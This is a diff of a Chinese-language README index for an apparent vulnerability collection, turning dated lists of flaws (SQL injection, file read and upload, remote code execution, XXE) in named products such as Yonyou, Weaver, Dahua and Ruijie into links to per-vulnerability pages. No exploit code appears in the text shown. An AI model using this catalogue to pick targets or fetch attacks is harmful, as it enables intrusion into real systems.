+- [湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞](./湖南建研检测系统/湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md)
 
 ## 2024.05.31 新增漏洞
 
-- PHP-Live-Chat代码审计之组合拳GetShell
-- 宏景eHR-showmedia.jsp存在SQL注入漏洞
-- NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208)
-- 用友智石开PLM-getWorkGroups存在信息泄露漏洞
-- 智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞
-- 中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞
-- JEPaaS低代码平台document存在文件上传致RCE漏洞
-- 大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞
-- Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)
-- 电信网关配置管理后台rewrite.php接口存在文件上传漏洞
+- [PHP-Live-Chat代码审计之组合拳GetShell](./PHP%20Live%20Chat/PHP-Live-Chat代码审计之组合拳GetShell.md)
+- [宏景eHR-showmedia.jsp存在SQL注入漏洞](./宏景OA/宏景eHR-showmedia.jsp存在SQL注入漏洞.md)
+- [NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208)](./NextGen/NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208).md)
+- [用友智石开PLM-getWorkGroups存在信息泄露漏洞](./用友OA/用友智石开PLM-getWorkGroups存在信息泄露漏洞.md)
+- [智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞](./智邦国际ERP/智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞.md)
+- [中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞.md)
+- [JEPaaS低代码平台document存在文件上传致RCE漏洞](./JEPaaS低代码平台/JEPaaS低代码平台document存在文件上传致RCE漏洞.md)
+- [大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞](./大华/大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md)
+- [Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)](./Check%20Point安全网关/Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md)
+- [电信网关配置管理后台rewrite.php接口存在文件上传漏洞](./电信网关配置管理/电信网关配置管理后台rewrite.php接口存在文件上传漏洞.md)
 
 ## 2024.05.28 新增漏洞
 
-- DCN有线无线智能一体化控制器WEB管理系统
-- 用友NC系统linkVoucher存在sql注入漏洞
-- 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行
-- 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行
-- 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行
-- 锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行
-- 锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行
-- 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取
-- 锐捷RG-EW1200G无线路由器登录绕过
-- Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞
-- WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495)
-- WordPress-WebDirectory插件存在sql注入(CVE-2024-3552)
-- WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443)
-- 因酷教育软件开源网校程序gok4任意文件上传漏洞
+- [DCN有线无线智能一体化控制器WEB管理系统](./DCN/DCN有线无线智能一体化控制器WEB管理系统.md)
+- [用友NC系统linkVoucher存在sql注入漏洞](./用友OA/用友NC系统linkVoucher存在sql注入漏洞.md)
+- [锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行.md)
+- [锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行.md)
+- [锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md)
+- [锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行.md)
+- [锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行.md)
+- [大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取](./大华/大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取.md)
+- [锐捷RG-EW1200G无线路由器登录绕过](./锐捷/锐捷RG-EW1200G无线路由器登录绕过.md)
+- [Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞](./JeecgBoot/Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md)
+- [WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495)](./WordPress/WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495).md)
+- [WordPress-WebDirectory插件存在sql注入(CVE-2024-3552)](./WordPress/WordPress-WebDirectory插件存在sql注入(CVE-2024-3552).md)
+- [WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443)](./WordPress/WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443).md)
+- [因酷教育软件开源网校程序gok4任意文件上传漏洞](./因酷教育软件/因酷教育软件开源网校程序gok4任意文件上传漏洞.md)
 
 ## 2024.05.25 新增漏洞
 
-- 瑞星EDR-XSS漏洞可打管理员cookie
+- [瑞星EDR-XSS漏洞可打管理员cookie](./瑞星EDR/瑞星EDR-XSS漏洞可打管理员cookie.md)
 
-- 金山云EDR任意文件上传漏洞
+- [金山云EDR任意文件上传漏洞](./金山/金山云EDR任意文件上传漏洞.md)
 
-- HM发卡网反序列化漏洞
+- [HM发卡网反序列化漏洞](./发卡网系统/HM发卡网反序列化漏洞.md)
 
-- Nexus未授权目录穿越漏洞(CVE-2024-4956)
-- 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202)
-- 万户ezEIP-success.aspx存在反序列化漏洞
-- 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)
-- 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞
-- 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞
-- 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞
-- 泛微E-Office10-OfficeServer任意文件上传漏洞
-- ArubaOS-RCE漏洞(CVE-2024-26304)
-- H3C路由器userLogin.asp信息泄漏漏洞
-- 用友nc电子采购信息系统securitycheck存在sql注入
-- 用友NC-warningDetailInfo接口存在SQL注入漏洞
-- Confluence远程命令执行漏洞(CVE-2024-21683)
-- 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞
-- 蓝海卓越计费管理系统存在download.php任意文件读取漏洞
+- [Nexus未授权目录穿越漏洞(CVE-2024-4956)](./Nexus/Nexus未授权目录穿越漏洞(CVE-2024-4956).md)
+- [泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202)](./泛微OA/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md)
+- [万户ezEIP-success.aspx存在反序列化漏洞](./万户OA/万户ezEIP-success.aspx存在反序列化漏洞.md)
+- [通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)](./通天星/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md)
+- [通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞](./通天星/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md)
+- [通天星CMSV6车载视频监控平台xz_center信息泄露漏洞](./通天星/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md)
+- [智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞](./智慧校园(安校易)管理系统/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md)
+- [泛微E-Office10-OfficeServer任意文件上传漏洞](./泛微OA/泛微E-Office10-OfficeServer任意文件上传漏洞.md)
+- [ArubaOS-RCE漏洞(CVE-2024-26304)](./Aruba/ArubaOS-RCE漏洞(CVE-2024-26304).md)
+- [H3C路由器userLogin.asp信息泄漏漏洞](./H3C/H3C路由器userLogin.asp信息泄漏漏洞.md)
+- [用友nc电子采购信息系统securitycheck存在sql注入](./用友OA/用友nc电子采购信息系统securitycheck存在sql注入.md)
+- [用友NC-warningDetailInfo接口存在SQL注入漏洞](./用友OA/用友NC-warningDetailInfo接口存在SQL注入漏洞.md)
+- [Confluence远程命令执行漏洞(CVE-2024-21683)](./Confluence/Confluence远程命令执行漏洞(CVE-2024-21683).md)
+- [蓝海卓越计费管理系统存在debug.php远程命令执行漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md)
+- [蓝海卓越计费管理系统存在download.php任意文件读取漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md)
 
 ## 2024.05.23 新增漏洞
 
-- 致远OAV52019系统properties信息泄露漏洞
-- GeoServer系统wms接口存在远程命令执行漏洞
-- 用友NC-complainbilldetail存在SQL注入漏洞
-- 用友NC-downTax存在SQL注入漏洞
-- 宏景eHR-OutputCode存在任意文件读取漏洞
-- 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)
-- 懒人网址导航页search.html存在SQL注入漏洞
-- LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞
-- LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞
-- 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞
-- 蓝海卓越计费管理系统SQL注入漏洞
-- 铭飞CMS-search接口存在sql注入漏洞
+- [致远OAV52019系统properties信息泄露漏洞](./致远OA/致远OAV52019系统properties信息泄露漏洞.md)
+- [GeoServer系统wms接口存在远程命令执行漏洞](./GeoServer/GeoServer系统wms接口存在远程命令执行漏洞.md)
+- [用友NC-complainbilldetail存在SQL注入漏洞](./用友OA/用友NC-complainbilldetail存在SQL注入漏洞.md)
+- [用友NC-downTax存在SQL注入漏洞](./用友OA/用友NC-downTax存在SQL注入漏洞.md)
+- [宏景eHR-OutputCode存在任意文件读取漏洞](./宏景OA/宏景eHR-OutputCode存在任意文件读取漏洞.md)
+- [用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)](./用友OA/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md)
+- [懒人网址导航页search.html存在SQL注入漏洞](./懒人网址导航页/懒人网址导航页search.html存在SQL注入漏洞.md)
+- [LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞](./LVS精益价值管理系统/LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md)
+- [LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞](./LVS精益价值管理系统/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md)
+- [泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞](./泛微OA/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md)
+- [蓝海卓越计费管理系统SQL注入漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统SQL注入漏洞.md)
+- [铭飞CMS-search接口存在sql注入漏洞](./铭飞/铭飞CMS-search接口存在sql注入漏洞.md)
 
 ## 2024.05.21 新增漏洞
 
-- QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130)
-- Zabbix-Serve-SQL注入漏洞(CVE-2024-22120)
-- 山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞
-- 方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞
-- Git远程代码执行漏洞(CVE-2024-32002)
-- Gradio存在任意文件读取漏洞(CVE-2024-1561)
-- EasyCVR视频管理平台存在任意用户添加漏洞
-- 用友U8-Cloud系统XChangeServlet接口存在XXE漏洞
-- emlog后台插件任意文件上传(CVE-2024-33752)
-- 泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞
-- cockpit系统upload接口存在文件上传漏洞
-- 宏景HCM系统fieldsettree接口存在SQL注入漏洞
+- [QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130)](./QNAP/QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130).md)
+- [Zabbix-Serve-SQL注入漏洞(CVE-2024-22120)](./Zabbix/Zabbix-Serve-SQL注入漏洞(CVE-2024-22120).md)
+- [山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞](./山东聚恒网络技术有限公司/山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞.md)
+- [方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞](./方正全媒体/方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞.md)
+- [Git远程代码执行漏洞(CVE-2024-32002)](./Git/Git远程代码执行漏洞(CVE-2024-32002).md)
+- [Gradio存在任意文件读取漏洞(CVE-2024-1561)](./Gradio/Gradio存在任意文件读取漏洞(CVE-2024-1561).md)
+- [EasyCVR视频管理平台存在任意用户添加漏洞](./EasyCVR视频管理平台/EasyCVR视频管理平台存在任意用户添加漏洞.md)
+- [用友U8-Cloud系统XChangeServlet接口存在XXE漏洞](./用友OA/用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md)
+- [emlog后台插件任意文件上传(CVE-2024-33752)](./Emlog/emlog后台插件任意文件上传(CVE-2024-33752).md)
+- [泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞](./泛微OA/泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞.md)
+- [cockpit系统upload接口存在文件上传漏洞](./cockpit/cockpit系统upload接口存在文件上传漏洞.md)
+- [宏景HCM系统fieldsettree接口存在SQL注入漏洞](./宏景OA/宏景HCM系统fieldsettree接口存在SQL注入漏洞.md)
 
 ## 2024.05.18 新增漏洞
 
-- 英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞
-- 佳会视频会议attachment任意文件读取
-- 六零导航页存在任意文件上传漏洞
-- SeaCMS海洋影视管理系统dmku存在SQL注入漏洞
-- 用友CRM系统uploadfile.php接口存在任意文件上传
-- 安达通TPN-2G安全网关远程代码执行
-- 科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞
-- 科拓全智能停车收费系统Webservice.asmx存在任意文件上传
-- D-LINK-DIR-X4860未授权RCE漏洞
+- [英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞](./英飞达医学影像存档与通信系统/英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md)
+- [佳会视频会议attachment任意文件读取](./佳会视频会议/佳会视频会议attachment任意文件读取.md)
+- [六零导航页存在任意文件上传漏洞](./六零导航页/六零导航页存在任意文件上传漏洞.md)
+- [SeaCMS海洋影视管理系统dmku存在SQL注入漏洞](./海洋cms/SeaCMS海洋影视管理系统dmku存在SQL注入漏洞.md)
+- [用友CRM系统uploadfile.php接口存在任意文件上传](./用友OA/用友CRM系统uploadfile.php接口存在任意文件上传.md)
+- [安达通TPN-2G安全网关远程代码执行](./安达通/安达通TPN-2G安全网关远程代码执行.md)
+- [科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞](./科拓全智能停车收费系统/科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md)
+- [科拓全智能停车收费系统Webservice.asmx存在任意文件上传](./科拓全智能停车收费系统/科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md)
+- [D-LINK-DIR-X4860未授权RCE漏洞](./D-Link/D-LINK-DIR-X4860未授权RCE漏洞.md)
 
 ## 2024.05.13 新增漏洞
-- 用友NC系统registerServlet接口存在JNDI注入漏洞
-- 微擎-AccountEdit-file-upload文件上传漏洞
-- RuvarOA协同办公平台多处存在SQL注入漏洞
-- 微厦在线学习平台OrganSetup存在任意文件上传漏洞
-- 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞
-- 用友NC系统printBill接口存在任意文件读取漏洞
-- 泛微-OA系统ResourceServlet接口任意文件读取漏洞
-- 锐捷网络flwo.control.php存在RCE漏洞
-- 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞
-- 大华ICC智能物联综合管理平台存在fastjson漏洞
-- 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞
-- 世纪信通管理系统DownLoadFiles.ashx存在任意文件读取
-- 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞
+- [用友NC系统registerServlet接口存在JNDI注入漏洞](./用友OA/用友NC系统registerServlet接口存在JNDI注入漏洞.md)
+- [微擎-AccountEdit-file-upload文件上传漏洞](./微擎/微擎-AccountEdit-file-upload文件上传漏洞.md)
+- [RuvarOA协同办公平台多处存在SQL注入漏洞](./RuvarOA协同办公平台/RuvarOA协同办公平台多处存在SQL注入漏洞.md)
+- [微厦在线学习平台OrganSetup存在任意文件上传漏洞](./微厦在线学习平台/微厦在线学习平台OrganSetup存在任意文件上传漏洞.md)
+- [泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞](./泛微OA/泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md)
+- [用友NC系统printBill接口存在任意文件读取漏洞](./用友OA/用友NC系统printBill接口存在任意文件读取漏洞.md)
+- [泛微-OA系统ResourceServlet接口任意文件读取漏洞](./泛微OA/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md)
+- [锐捷网络flwo.control.php存在RCE漏洞](./锐捷/锐捷网络flwo.control.php存在RCE漏洞.md)
+- [亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md)
+- [大华ICC智能物联综合管理平台存在fastjson漏洞](./大华/大华ICC智能物联综合管理平台存在fastjson漏洞.md)
+- [联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞](./联软/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md)
+- [世纪信通管理系统DownLoadFiles.ashx存在任意文件读取](./世纪信通管理系统/世纪信通管理系统DownLoadFiles.ashx存在任意文件读取.md)
+- [亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md)
 
 ## 2024.05.08 新增漏洞
-- 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞
-- 用友时空KSOA-linkadd.jsp存在SQL注入漏洞
-- MetaCRM客户关系管理系统任意文件上传漏洞
-- 用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞
-- 电信网关配置管理后台ipping.php存在命令执行漏洞
-- 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞
-- 泛微OA-E-Cology-FileDownload文件读取漏洞
-- 用友GRPA++Cloud政府财务云存在任意文件读取漏洞
-- 红海云eHR-PtFjk.mob存在任意文件上传漏洞
-- 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞
-- 金和OAC6-FileDownLoad.aspx任意文件读取漏洞
-- F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)
-- Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640)
-- 中移铁通禹路由器信息泄露漏洞
-- 致远M3敏感信息泄露漏洞
-- Jan任意文件上传漏洞
-- Jeecg任意文件上传漏洞
-- 医院挂号系统SQL注入
+- [用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞](./用友OA/用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md)
+- [用友时空KSOA-linkadd.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA-linkadd.jsp存在SQL注入漏洞.md)
+- [MetaCRM客户关系管理系统任意文件上传漏洞](./MetaCRM/MetaCRM客户关系管理系统任意文件上传漏洞.md)
+- [用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞](./用友OA/用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md)
+- [电信网关配置管理后台ipping.php存在命令执行漏洞](./电信网关配置管理/电信网关配置管理后台ipping.php存在命令执行漏洞.md)
+- [瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞](./瑞友天翼应用虚拟化系统/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md)
+- [泛微OA-E-Cology-FileDownload文件读取漏洞](./泛微OA/泛微OA-E-Cology-FileDownload文件读取漏洞.md)
+- [用友GRPA++Cloud政府财务云存在任意文件读取漏洞](./用友OA/用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md)
+- [红海云eHR-PtFjk.mob存在任意文件上传漏洞](./红海云eHR/红海云eHR-PtFjk.mob存在任意文件上传漏洞.md)
+- [福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞](./福建科立讯通信/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md)
+- [金和OAC6-FileDownLoad.aspx任意文件读取漏洞](./金和OA/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md)
+- [F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)](./F5-BIG-IP/F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md)
+- [Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640)](./Mura/Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md)
+- [中移铁通禹路由器信息泄露漏洞](./路由器/中移铁通禹路由器信息泄露漏洞.md)
+- [致远M3敏感信息泄露漏洞](./致远OA/致远M3敏感信息泄露漏洞.md)
+- [Jan任意文件上传漏洞](./Jan/Jan任意文件上传漏洞.md)
+- [Jeecg任意文件上传漏洞](./JeecgBoot/Jeecg任意文件上传漏洞.md)
+- [医院挂号系统SQL注入](./医院挂号系统/医院挂号系统SQL注入.md)
 
 ## 2024.05.02 新增漏洞
-- 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞
-- 用友NC-bill存在SQL注入漏洞
-- 用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞
-- OpenMetadata-SpEL注入(CVE-2024-28848)
-- OpenMetadata命令执行漏洞(CVE-2024-28253)
-- Ncast高清智能录播系统存在任意文件读取漏洞
-- AJ-Report开源数据大屏存在远程命令执行漏洞
-- 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞
+- [和丰多媒体信息发布系统QH.aspx存在文件上传漏洞](./和丰多媒体信息发布系统/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md)
+- [用友NC-bill存在SQL注入漏洞](./用友OA/用友NC-bill存在SQL注入漏洞.md)
+- [用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞](./用友OA/用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md)
+- [OpenMetadata-SpEL注入(CVE-2024-28848)](./OpenMetadata/OpenMetadata-SpEL注入(CVE-2024-28848).md)
+- [OpenMetadata命令执行漏洞(CVE-2024-28253)](./OpenMetadata/OpenMetadata命令执行漏洞(CVE-2024-28253).md)
+- [Ncast高清智能录播系统存在任意文件读取漏洞](./Ncast高清智能录播系统/Ncast高清智能录播系统存在任意文件读取漏洞.md)
+- [AJ-Report开源数据大屏存在远程命令执行漏洞](./AJ-Report/AJ-Report开源数据大屏存在远程命令执行漏洞.md)
+- [大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞](./大华/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md)
 
 ## 2024.04.30 新增漏洞
-- 亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞
-- 亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞
-- 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞
-- 蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257)
-- Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞
-- Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148)
-- 广州图书馆集群系统WebBookNew存在SQL注入漏洞
-- Likeshop-formimage任意文件上传
-- X2Modbus网关GetUser接口存在信息泄漏漏洞
-- WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956)
-- 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞
-- LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)
-- 北京亚控科技KingPortal开发系统漏洞集合
+- [亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞.md)
+- [亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞.md)
+- [亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md)
+- [蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257)](./蓝网科技临床浏览系统/蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257).md)
+- [Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞](./Pkpmbs建设工程质量监督系统/Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞.md)
+- [Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148)](./Mingsoft/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md)
+- [广州图书馆集群系统WebBookNew存在SQL注入漏洞](./广州图创图书馆集群管理系统/广州图书馆集群系统WebBookNew存在SQL注入漏洞.md)
+- [Likeshop-formimage任意文件上传](./Likeshop/Likeshop-formimage任意文件上传.md)
+- [X2Modbus网关GetUser接口存在信息泄漏漏洞](./X2Modbus/X2Modbus网关GetUser接口存在信息泄漏漏洞.md)
+- [WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956)](./WordPress/WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956).md)
+- [北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞](./北京中科聚网/北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md)
+- [LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)](./LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md)
+- [北京亚控科技KingPortal开发系统漏洞集合](./北京亚控科技/北京亚控科技KingPortal开发系统漏洞集合.md)
 
 ## 2024.04.28 新增漏洞
-- 用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞
-- 用友GRP-U8-listSelectDialogServlet存在SQL注入
-- 用友GRP-U8-bx_dj_check.jsp存在SQL注入
-- 用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入
-- 用友GRP-U8-userInfoWeb存在SQL注入
-- 用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入
-- 用友GRP-U8-Proxy存在SQL注入漏洞
-- 用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞
-- 用友GRP-U8-FileUpload任意文件上传
-- 用友GRP-U8-UploadFileData任意文件上传
-- 用友GRP-U8-ufgovbank存在XXE漏洞
-- 用友GRP-U8-PayReturnForWcp接口存在XXE漏洞
-- 用友GRP-U8日志泄漏漏洞
+- [用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞](./用友OA/用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞.md)
+- [用友GRP-U8-listSelectDialogServlet存在SQL注入](./用友OA/用友GRP-U8-listSelectDialogServlet存在SQL注入.md)
+- [用友GRP-U8-bx_dj_check.jsp存在SQL注入](./用友OA/用友GRP-U8-bx_dj_check.jsp存在SQL注入.md)
+- [用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入](./用友OA/用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md)
+- [用友GRP-U8-userInfoWeb存在SQL注入](./用友OA/用友GRP-U8-userInfoWeb存在SQL注入.md)
+- [用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入](./用友OA/用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入.md)
+- [用友GRP-U8-Proxy存在SQL注入漏洞](./用友OA/用友GRP-U8-Proxy存在SQL注入漏洞.md)
+- [用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞](./用友OA/用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞.md)
+- [用友GRP-U8-FileUpload任意文件上传](./用友OA/用友GRP-U8-FileUpload任意文件上传.md)
+- [用友GRP-U8-UploadFileData任意文件上传](./用友OA/用友GRP-U8-UploadFileData任意文件上传.md)
+- [用友GRP-U8-ufgovbank存在XXE漏洞](./用友OA/用友GRP-U8-ufgovbank存在XXE漏洞.md)
+- [用友GRP-U8-PayReturnForWcp接口存在XXE漏洞](./用友OA/用友GRP-U8-PayReturnForWcp接口存在XXE漏洞.md)
+- [用友GRP-U8日志泄漏漏洞](./用友OA/用友GRP-U8日志泄漏漏洞.md)
   
 ## 2024.04.27 新增漏洞
-- 通达OA-WHERE_STR存在前台SQL注入漏洞
-- 用友GRP-U8-obr_zdybxd_check存在sql注入漏洞
-- 用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞
-- 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞
